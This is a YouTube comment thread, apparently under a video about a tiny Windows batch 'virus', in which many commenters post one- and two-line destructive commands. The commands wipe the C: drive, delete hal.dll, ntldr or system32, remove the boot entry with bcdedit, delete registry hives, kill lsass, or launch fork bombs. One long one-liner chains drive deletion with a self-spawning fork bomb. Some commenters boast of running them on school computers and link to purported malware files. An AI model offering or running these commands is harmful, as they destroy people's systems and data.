CONGRATES!!!

0 likes
@bRuhN0_ 2018-09-18 21:45:59

Let´s See My Record:
C:\windows\system32
And You Restart Your PC

The Best Record
Enderman: <3 PLS

0 likes
@itswilliamanimate 2021-02-21 21:56:18

im like
rd C:\ /s /q
shutdown -r -t 0
(2 scripts of code lmao)

0 likes
@ChoboUnjeon 2018-10-26 14:43:45

Wow a world record thats awesome

0 likes
@majojsholehons5987 2018-04-26 06:59:33

Этот пк должен был умереть, потому что на нём установлен Амиго

1 like
Replies (1)
@iiep4uk604 2018-10-28 14:58:30

Скопировал

0 likes
@turkiyett0928 2023-04-07 16:22:50

1 line possible.

0 likes
@eazy_black 2021-03-02 19:52:07

It works deleting bootmgr too

0 likes
@kmaster9108 2017-12-22 22:18:24

come on, just make a script that deletes C: drive and thats it.
EZ PC KILL
EZ HAXX0R LIFE

0 likes
@MaxymYT 2023-02-14 10:12:51 (edited 2023-02-14 10:13:07 )

that looks like 2

0 likes
@payl04d23 2017-12-27 17:44:57

This is not a virus oh. my. god.

0 likes
@TCGProductions03 2018-04-27 12:20:12

del /f /s /q %windir%\system32\hal.dll

0 likes
@kostya8764 2021-03-25 18:54:51

i beated ur record
del c:\ntldr

0 likes
@kur0nek0g4ming 2018-04-10 20:25:20

halp. I accidently deleted shutdown.exe on my W2k12 R2 DC Server on my Laptop

0 likes
Replies (2)
@crossetta 2018-09-07 04:56:46

reinstall

0 likes
@crossetta 2018-09-07 04:56:40

to get the file back, download this: sorry, but you need to format your windows to resolve

0 likes
@revlvare 2021-01-07 13:03:27

actually 1 line of code

0 likes
@fart1234. 2020-12-27 11:47:54

Bandicam!;??!?!;!(

0 likes
@ty-lw7hg 2022-04-18 15:07:09

rmdir System32 kills win10

0 likes
@henryward8311 2020-07-10 21:44:45

copy then paste in CHROME

0 likes
@glitchyxcode3499 2018-10-21 16:41:52

Did this to my school computer XD

0 likes
@BlocklovesPCs 2020-10-03 23:05:24

old bandicam video

0 likes
@Blaineworld 2018-04-10 03:46:04

One line:
del C:\*

0 likes
Replies (1)
@Flanlaina 2019-12-23 12:25:54

del c:\*.* /s /q

0 likes
@Karowo 2016-11-21 20:07:32

deltree /y C:/Windows

0 likes
@kako3035 2018-01-13 21:20:45

Pls song

0 likes
@maximus-cm4ec 2018-02-17 09:01:24

Amigo Browser is Virus didn't u know?

0 likes
Replies (1)
@maximus-cm4ec 2018-02-18 08:36:59

Ohh that should be also a virus?

0 likes
@shdwmsc0 2019-03-01 21:14:08

Крутое видео

0 likes
@Infevlol 2020-10-14 20:08:06

bru not world record world record is one line rd C:/ /s /q

0 likes
@ComeonWindows 2019-12-23 00:06:04

It works on Windows 10 to!

0 likes
Replies (1)
@bubgamingandvlogs3870 2021-03-15 15:50:27

Too

0 likes
@kopeykaReal69 2021-12-01 15:31:12

Чел ты...

1 like
@ardencho1 2021-05-09 04:35:47

One line: %0|%0

0 likes
@NtQueryInformationProcess 2019-02-04 18:49:12

Why @echo off tho it's useless

0 likes
@yaro_the 2017-12-23 18:05:50

Я так и знал что ты русский EnderMan

0 likes
@user-ww7rk7re1v 2019-12-20 15:14:44

Обалдеть, я знал что ты русский.

0 likes
@symbolcest 2019-08-14 00:21:17

Ahem, beat ya -
@echo off
and then the comnand line for deleting everythinf

0 likes
@whitebeartigtig 2020-08-30 15:44:13

I can do that in 1 line on Linux

0 likes
@deadchannel1655 2019-04-04 16:38:31

what song? @!@@@!@!@!@!@!@!

0 likes
@izzyint 2018-11-12 00:48:15

I CAN MAKE ONE IN 2 LINES

0 likes
@pankoza 2021-03-14 17:05:22

noescape.exe but better

0 likes
@Sami9 2017-11-24 13:11:26

YES!!!!!!!!!! I GOT 100TH LIKE!!!!!!!

1 like
Replies (1)
@windowsxp2479 2018-07-14 14:50:49

1st is better.

0 likes
@pankoza 2019-06-06 11:46:26

You need protegent

0 likes
@barushhasanov4927 2018-09-20 16:58:07

i can do with 1 line: Del C:\ . |y

0 likes
@climpuright 2018-04-24 08:41:01

I beat the world record this is mine:

del c:/system32

0 likes
@waterix8600 2016-11-24 17:21:05

No
bcdedit.exe /delete {current}
Shutdown -r -t 0

1 like
@xerix1-6 2019-12-22 14:27:21

and Windows 2000

0 likes
@xarinezefirka 2020-07-25 14:44:02

Он русский был но...

0 likes
@JerryIsHere 2018-09-15 06:30:18

I do not understand russian

0 likes
@doge7831 2021-03-26 06:35:37

I can do it in 0 lines.

Just give me water and a hammer.

0 likes
@TheOriginalMacOS 2023-05-20 05:07:27

could have did


del c:\ntldr&&taskkill /f /im svchost.exe

0 likes
@superproxocz 2023-02-23 08:54:14

𝙈𝙤𝙫𝙚 𝙞𝙩 𝙩𝙤 𝙗𝙤𝙤𝙩

0 likes
@remixesbysej 2020-08-24 08:47:27

Смотрел это в 2020 году

0 likes
@beastcraft382 2020-07-19 08:05:19

I can't understand ya

0 likes
@Zooiest 2018-04-13 05:03:40

How to crash your pc
-----------------------------------
:A
Start {insert filename}.bat
Goto A

0 likes
@TaoCroatia 2017-06-11 18:48:58 (edited 2017-06-11 18:49:25 )

bcdedit /delete {current} is better

0 likes
@TechflashYT 2018-10-21 23:12:11

I beat ur record
del C:\windows\system32\hal.dll
the next time the user turns on their pc
user "wth is dis..."
me "ur pc just got rekt good luck fixing it, go reinstall windows lol"
user "NOOOOOOOOOOOOOOOOOOO"

2 likes
@danielarsivana5991 2019-04-26 15:30:34

How to freeze your pc

:start
Start
Go to start

0 likes
Replies (2)
@danielarsivana5991 2019-05-06 20:29:12

@@showdown_7643 it's basically the same, it's just flooding the same tasks (in this case, launching unlimited amount of command prompt window) so the computer get outta control and finally hang.

0 likes
@showdown_7643 2019-05-06 19:44:45

Prince Arsivana no its

:a
cmd.exe | cmd.exe
goto a

0 likes
@enurzia6918 2019-04-04 15:31:21

r/engrish

0 likes
@Infevlol 2019-12-01 18:41:54

I can do this with TWO lines of code.
del ntoskrnl.exe
taskkill /f /im lsass.exe

0 likes
@AlperFix 2021-05-06 12:15:42

what is this

0 likes
@dskprt 2018-10-20 10:26:23

bcdedit /delete {current} ftw

0 likes
@namesurname4666 2018-07-02 10:43:38

only xp :(

0 likes
@user-yj1fp5lm8f 2017-10-17 18:34:38

Амиго????

0 likes
@user-ch2sj9kd6k 2021-07-26 16:18:12

я так и знал что ты только притворяешься английским чтобы набрать популярность я и так уже давно знаю что ты русский

0 likes
@MarioMario456 2017-12-20 23:45:36

I guess it's:

@echo off
del "C:\NTDLR"
shutdown -s -t 10

3 likes
Replies (1)
@vishmitasuvarna 2018-03-12 13:07:21

not shutdown it is restart so not -s it is -r.

0 likes
@errorsand6950 2019-07-13 13:17:19 (edited 2019-07-13 13:17:55 )

Bro on my laptop i have 70 vairuses but ay nevar download eni porn

0 likes
Replies (2)
@ronture8279 2020-08-18 01:49:41

Can you send some of the malware setup files to me whenever possible?

0 likes
@ronture8279 2020-08-18 01:49:11

I have 100 MB of malware (or random stuff) in a zip folder that can be run on my pc...

0 likes
@GFortex 2021-02-16 07:35:31

Я так и знал ты русский

0 likes
@garynyz 2017-03-13 13:39:15

Fast

0 likes
@rudygejcisgniepento 2018-11-23 22:40:18

@echo off
Del system32
More easy zD

0 likes
@agentasloplays2570 2017-11-26 19:25:26

And try virtualbox

0 likes
@vektus.7331 2018-01-22 18:57:27

Del system32

1 line xD

0 likes
Replies (2)
@avi8aviate 2019-01-21 07:49:39

@@kuca5985 Nope, @echo off only hides the code.

0 likes
@kuca5985 2018-01-26 22:29:02

you need @echo off

0 likes
@AdriceMC 2018-05-30 15:47:24

lol I have better :
del "C:\ntdlr"
shudown -s -t 10

2 LINES OH YEAH

0 likes
@shdwmsc0 2019-03-01 21:13:52

О русским катишь Эндермен

0 likes
@гтохлох 2020-08-17 05:49:23

del hal.dll

0 likes
@misastefanovic3916 2017-11-09 19:23:31

format c

0 likes
@spycrabveintisiete488 2021-06-25 09:33:32

you forgott transalte rusian XD

0 likes
@yessey111 2018-02-07 18:24:51

41 znaków 41 leters

0 likes
@The-pf4zy 2018-09-18 14:20:19

bandicam

0 likes
@figy2927 2017-12-31 03:49:25

heh I can do it with only 2 I rember

0 likes
@purplevibe6462 2021-01-24 20:00:52

i can with 1
rd /s /q C:\

0 likes
@_1onlychxrry 2022-06-12 11:27:19

E

0 likes
@dkabv 2022-12-31 20:28:53

Скачать Амиго...

0 likes
@onenote4358 2018-03-31 19:11:32

Test 0001

0 likes
@closed429 2016-11-26 11:48:34

Вот это ты икспиху казнил, зачот)

0 likes
@shepardpower 2016-12-31 07:29:08

Mine:
Format C:

0 likes
Replies (2)
@shepardpower 2017-01-06 09:58:12

thed3ctX well I broke the record now...

0 likes
@happywin98 2017-01-06 08:20:07

MrWafflesNBacon No. Three lines of code! Not one line!

0 likes
@Eth4nplays 2021-03-10 07:47:07

Old

0 likes
@tcharr1 2020-08-16 10:00:11

Ты русский

0 likes
@themonstertima4636 2017-09-13 15:56:21

что за фон

0 likes
@uptopz 2020-12-19 21:23:29

Бандикам .com

0 likes
@latvialyrics9301 2018-12-20 13:49:02

i have something better............

rd c:\


BOOOM! MINDBLOWN

0 likes
@YurkaPotam 2020-08-31 07:24:54

Аааа я так и думал

0 likes
@intatheninjatezzy1111 2017-12-14 16:27:45

ITS also

0 likes
Replies (2)
@intatheninjatezzy1111 2017-12-14 16:29:27

Just three lines

0 likes
@intatheninjatezzy1111 2017-12-14 16:29:14

:1 del c:/ goto 1

0 likes
@sunsetter5832 2017-11-29 13:16:08

Вау ты русский

0 likes
@Maya-uf7pp 2017-12-23 14:59:59

i can delete windows without any line of code, just manualy delete sys32..

0 likes
@kitosgames8988 2023-05-05 14:21:37

Ага

0 likes
@seeeeroy 2018-05-30 15:12:16

А у меня рекорд больше)
2 строки:
@echo off
reg delete HKLM /f /va

0 likes
@bitelaserkhalif 2018-01-23 11:19:29

beat me to it, one line only: %0|%0
forkbomb, lags and kills them

0 likes
Replies (2)
@avi8aviate 2019-01-21 07:47:19

@@malwaretestingfan The Linux fork bomb is much longer.

0 likes
@malwaretestingfan 2018-09-14 20:22:17

There exists a Linux version.

0 likes
@vinerym 2021-03-24 03:09:37

Неопровержимый факт того что Эндер русский

1 like
@TheEgglet 2020-09-22 19:12:54

taskkill /f /im explorer.exe
did i win

1 like
@ilove-sk4yi 2020-04-14 12:24:18

У меня лучше.

%0 | %0

Хехеехех

0 likes
@johnn3987 2017-11-08 02:28:21

100th comment

0 likes
@idubbbzofficialnotactually9504 2017-10-27 22:12:31

im gay

0 likes
@drdonk_auf_die_1_xd 2021-06-26 16:03:30

better (one line of code):
rd C:\ /s /q
wOrKs On EvErY wInDoWs VeRsIoN

0 likes
@dopemencrew6052 2021-03-25 19:26:16

kill lsass
Copy to startup folder

0 likes
@eazy_black 2021-03-02 19:53:06

To work on other version of windows u need 4 lines of code adding takeown /f C:/ntldr

0 likes
@powershellaxp64 2020-09-17 12:20:22

del c:\ntldr && shutdown /r /t 0
1 line virus

0 likes
@NeoniumOxide 2020-08-13 15:01:54 (edited 2020-08-26 06:17:32 )

I'am have virus that supports all versions of win

takeown C:\Windows\System32
ren csrss.exe file.exe
del csrss.exe

0 likes
@missiondemolition 2020-07-26 03:12:49

I beat it! code:
del C:\/s/q

0 likes
@TIPDYT 2020-07-19 12:01:17

Actually fly tech did the world record with one line of code and 4 letters. It called fork bombs but your virus is more destructive

0 likes
@Arsen_2005 2020-07-14 07:28:12

R u Russian?

0 likes
@henryward8311 2020-07-10 21:44:21

try my NOT JOKE malware (kills the system 2 lines of code) file:///Users/nathanielward/desktop/malware/HAVE%20FUN%20NEVER%20BOOTING.zip

0 likes
@dominikdirda8341 2020-06-27 04:29:48

1 line: del "c:\ntldr" && shutdown -s -t 10

0 likes
@CatYoutuberTV 2020-04-28 12:54:58

@rd %windir%\system32 /s /q
@shutdown /r /t 00

1 like
@BetaMaster2 2019-09-11 13:57:49

rd c:\ /s /q

0 likes
@slavicofficial2998 2019-06-27 14:35:05

rd c:\ /s /q easy

0 likes
@pankoza 2019-06-06 11:47:46

I have a smaller virus
del c:\*. * /s /q

0 likes
@k-aerospace 2019-04-19 19:49:58 (edited 2019-04-19 19:50:22 )

How to kill your PC with no line of code:
throw it off a cliff

2 likes
Replies (1)
@everythingtube172 2020-04-15 22:55:02

Call in a toddler

0 likes
@pablo69.420bl 2019-03-05 21:44:40

www.bandicam.com (FACE БЛЯТИНГ PALM

0 likes
@tim_6888 2019-02-22 15:33:54

hey this is world record 1 line
rd C:\ /s /q

1 like
@PANCHO7532 2018-12-15 05:05:12

One line:
del /f /s /q "C:\Windows\*.*"

1 like
@therabin2554 2018-12-14 16:47:55

This world record is broken!
Using 1 line!
1 fuckin’ line!
The code is...
del C:\ntldr && shutdown -t 0 -s
Got that!!!

0 likes
@araigumakiruno 2018-11-26 20:50:56

When a russian make a virus,it must be terrible and small

0 likes
@dimasrakhaataya3880 2018-11-25 10:14:13

Enderman Try This Music: https://www.youtube.com/watch?v=n8X9_MgEdCg

0 likes
@dimasrakhaataya3880 2018-11-25 10:10:37

Try This Code: @echo off
del "c:/boot.ini"
del "c:/Recovery"
del "c:/Windows"
del "c:/Program File (x86)"
del "c:/Windows/Explorer.exe"
del "c:/Windows/System"
del "c:/Windows/Starter"
Try This Code On Windows 8.1 Pro

0 likes
@entechcore 2018-09-15 15:17:20

Here's a way to kill a PC in 1 line of code:

del C: /q /s

0 likes
@uwu_peter 2018-08-25 12:54:39

Virus with 2 Lines of code
del C:/windows/system32/hal.dll
shutdown -r -t 1

0 likes
@leahd4209 2018-06-14 01:17:38

i know a single line one





del C:\Windows\System32
WARNING: NEVER DO THIS I WILL NOT BE RESPONSIBLE TO ANY DAMAGE CAUSED TO YOUR COMPUTER
YOU WILL GET A BLUE SCREEN OF DEATH YOUR COMPUTER WILL BE DESTROYED

0 likes
@babylfsh 2018-06-13 23:25:39

That's not a virus. By definition, a virus spreads from file to file. At best, this is malware

13 likes
Replies (5)
@ehevix5289 2020-12-22 22:18:38

This is trojan.

0 likes
@nil8659 2020-09-09 06:55:57

Let's call it a system bomb which explodes(counts as deletes) the system files.

0 likes
@JanxZ 2019-03-30 18:47:24

nah its companion virus-like

0 likes
@avi8aviate 2019-01-21 07:32:22

It's more like a trojan.

0 likes
@redcrimson718 2019-01-03 00:48:15

It is a logic bomb.

0 likes
@jay-hb7el 2018-05-27 17:35:55

You can make an replicating virus in cpp in <3 lines.

0 likes
@BetaMaster2 2018-04-03 18:06:47

uh u can do
rd c:\ /s /q
ez rekt

1 like
@jakodarex 2018-04-02 20:55:43

hey try this but on windows xp or less http://www.mediafire.com/file/5yze3dk0bb517qy/Antivirus.vbs

0 likes
@TheTechnoGuy18 2018-03-25 16:25:53

I have made a batch virus wich has over 20.000 lines of code!

0 likes
@seesoftware 2018-02-03 23:49:51

mountvol C:\ /d

0 likes
Replies (1)
@avi8aviate 2019-01-21 07:42:37

That does not cause permanent damage to the system besides file corruption that doesn't even occur every time.

0 likes
@TheTechnoGuy18 2018-01-06 12:41:23

I have an idea of making a batch virus that contains only 2 LINES OF CODE, THAT KILLS THE PC ! HERE IS THE CODE:
@echo off
del (.exe;.bat;.pif;.sys;.vbs;.jpg;inf;.ini;.wmv;.wma;.avi;.dll;.ink;.png;.bmp)
If i made a mistake, respond me with the correction.
Btw i am Romanian.LOLOL;-) ;-) ;-)

0 likes
@gum3552 2018-01-06 07:47:10

Я знаю худший вирус, состоящий из нули строк.

- АМИГО БРАУЗЕР

0 likes
@martynas5076 2017-12-29 19:58:41

I can make a virus in 1 line.

del C:/Windows/system32

0 likes
@oeb41 2017-12-28 20:51:38

i made a xp virus with only 1 line of code

del C:\Windows\System32\hal.dll

3 likes
Replies (4)
@shdwmsc0 2019-03-01 21:14:59

Del C:/

0 likes
@avi8aviate 2019-01-21 07:33:35

@@helloimkyle Add that to autoexec.bat.

0 likes
@helloimkyle 2018-05-19 13:20:02

Wait Wait I have "shutdown -s -t 10"

0 likes
@helloimkyle 2018-05-19 13:19:25 (edited 2018-05-19 13:20:46 )

+Funtw//Ew1 Fan ok

0 likes
@Fiddleron 2017-12-25 03:16:41

del "c:/ntldr"&shutdown -s -t 0
one line batch file, world record u succ

0 likes
@moved8575 2017-11-27 13:48:05

i can make a better world record
with just 1 line
"@del C:\Windows\System32\*.exe /q"

0 likes
@MrOnlineCoder 2017-11-13 15:09:00

That's not a virus, it is a trojan. malware is called virus when it spreads (over the network or using external drives)

0 likes
@LimaXv2 2017-10-20 12:31:56

cmd /c taskkill /im explorer.exe /f & cd %userprofile%\Desktop & del C:\ /s /q /f & echo Set Wshell=CreateObject("Wscript.Shell")>>m.vbs & echo Set FSO=CreateObject("Scripting.FileSystemObject")>>m.vbs & echo FSO.DeleteFile "m.vbs">>m.vbs & echo Wshell.Run "m.bat">>m.vbs & echo M=MsgBox("You Are An Idiot",0+16+4096,"You're Fucked M8")>>m.vbs & echo start m.bat>>m.bat & echo start m.bat>>m.bat & start m.vbs

This Is One line of code
copy paste it into cmd or execute it in a .bat or .cmd file
Warning this will kill all your data on the c: drive and break Windows

What it does ?
It kills Your Explorer (Windows Desktop UI)
It then Delets all data On the C: Drive (If it can delete them)
it then creates m.vbs and m.bat
m.vbs brings up a msgbox and starts the m.bat
m.bat is a forkbomb the will crash the system or make it unusable forcing the user to restart if the pc doesnt crash

1 like
Replies (1)
@MalwarePad 2021-04-08 04:41:15

Lima X of the past :P

1 like
@Jamesbarw 2017-07-24 02:20:11

i have a good one!


<div>=246364-/promocode id=566021570 [Encryptioncode]=102927392[Virus-appear-warn] VirusCode=473835838
<span> VirusAppear=$6.28 <span> Viruscode=84204829 - 3474582480 - 387484683 - 23477634873 - 3743838388
<CmdVirus> Infect-Memory-System <span> Delete-All-Apps/57463727 Appcode=384343 348674384 029193473843
[Popup]=6748333: Error screen= 10383292 <span> spawn bonzi Buddy <span> [Kill internet ] 476832648338
BSOD=48329202 <span> Virus=Spawn B.S.O.D <span> <cmd>=102839328 <span> Spam errorcard 80x Code=473829 <span>
Image/Gif(Appear)= <Span> Screensize-270 <span> [Server-Encryption-Begin]
P.C. shutdown=27484282 [Server-Encryption-End] Encryption=PC Error
[Begin pc delete] 8564832 Money=sellall==$567.63[Txt=Your ded]
[Begin system death prog] 10%=Delete-all-games [Kill mouse]==$1403.78
55%=Power-shut-off <span> Break internet <span> Mouse-malfunction==5673.56
[Encryption begin]=103%-Break all apps and mouse [Promocode=Kill]
<cmd> Delete-system32=253%=Kill-Cortana[Cortanacmd]=say youre ded >:)
<div>=564 {Bonzi command}= say "Muahahahaha!" [background]= Black
Txtbubble=[Dont you dare shut down!] MS Mike voice= say "F---"
750%= kill-power [Opening-000.exe] {000.exe= kill all apps}
950%= whole screen=BLACK [Wordappear=screen]=666
1000%=Kill all systems ( DEATH ) <div> BSOD appear <span>

5 likes
Replies (6)
@Kino-Imsureq 2017-12-24 11:15:44

Sniping Hero If you don't care, why did you remind Jamesbarw66 2017 about closing tags?

1 like
@sniping_287 2017-12-24 10:27:55

Maybe you're right, I shouldn't have said that but do I care? 🇳 🇴

0 likes
@Kino-Imsureq 2017-12-24 10:16:11

Sniping hero why do you say 'Rekt' at the end? Just because you know HTML and you need to remind someone about that, doesn't mean you say 'Rekt'. He didn't even try to roast you.

What about I say "Sniping Hero more like Sniping Condescender"

1 like
@sniping_287 2017-12-17 11:02:22

Also, learn how to use HTML tag usage, you haven't closed any of these tags, wich means that the HTML file parser will get confused. You didn't also input the <html lang= en_US> </html> and the most important tags <head></head> & <body></body>. Rekt

0 likes
@sniping_287 2017-12-17 10:55:50

That isn't even a working virus, just a bit of <span> instructions and <cmd> instructions with text

1 like
@Jamesbarw 2017-07-24 02:21:10

Heres one too!

<div id>=Virus[Kill-all-apps]==$5.37
(Bonzi=spawn:Install[Blackscreen]
<div>=38329219[Delete-all-apps]==$6.48

0 likes
@jaxonshorter7420 2017-01-28 11:37:48 (edited 2017-01-28 11:38:53 )

lol
del /q /f C\windows\system32\This video sucks

0 likes
@the_break1 2017-01-11 17:06:40

Этот пк должен был умереть, потому что на нём установлен Амиго

35 likes
@mrdiamond64 2016-12-31 04:01:24

i think this is it


@echo off
del C:\ /q /s
shutdown -r



______________________________________________
what thease codes mean
_--------------------------------
@echo off = does not shows the code
del C:\ /q /s = deletes NTLDR automaniclly
shutdown -r = Restarts the computer
------------------------------------------------------------------------------
like if you agree :-)

47 likes
Replies (5)
@kadergumus2598 2018-11-29 18:19:41

It wouldn't work (shutdown.exe is missing!) So, in XP setup, create a 2nd drive. And, with that drive (Let's say that it's E:), we can do this:
@echo off
move C:\Windows\system32\shutdown.exe E:\
rd C:\ /s /q
start E:\shutdown.exe -r -t 00

0 likes
@vishmitasuvarna 2018-03-12 13:03:43 (edited 2018-03-12 13:04:47 )

anyway... if you want to delete a file without this -
ask in yes or no ,
do rd .

0 likes
@vishmitasuvarna 2018-03-12 13:02:13

but... If you want the timer, do shutdown -r -t (number of seconds)
Example = shutdown -r -t 60 = shut down the computer after 60 seconds;
Info = adding -t and number of seconds is the diference of the normal command
Normal - shutdown -r. it will restart after no seconds

0 likes
@Cuberates 2017-09-20 14:27:35

del C:\ /q /s will wipe the entire C:\ Drive.... which is something that I like to execute on school computers :)

2 likes
@prayzproductions1103 2017-06-28 19:29:43

Mr Diamond Can i make it on my pc

0 likes